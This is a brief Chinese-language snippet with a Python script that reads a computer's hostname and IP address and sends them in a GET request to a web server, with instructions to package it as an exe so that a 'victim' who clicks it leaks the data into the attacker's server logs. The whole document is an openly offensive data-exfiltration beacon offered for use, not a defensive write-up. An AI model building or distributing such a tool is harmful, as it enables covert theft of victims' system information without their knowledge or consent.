搭建一个web单页(例如Nginx默认页),将脚本打包成exe文件,受害者点击后即可在日志中查询到信息。
python
import socket
import requests
hostname = socket.gethostname()
print(hostname)
ip = socket.gethostbyname(hostname)
print(ip)
requests.get('http://example.com/'+hostname+'/'+ip)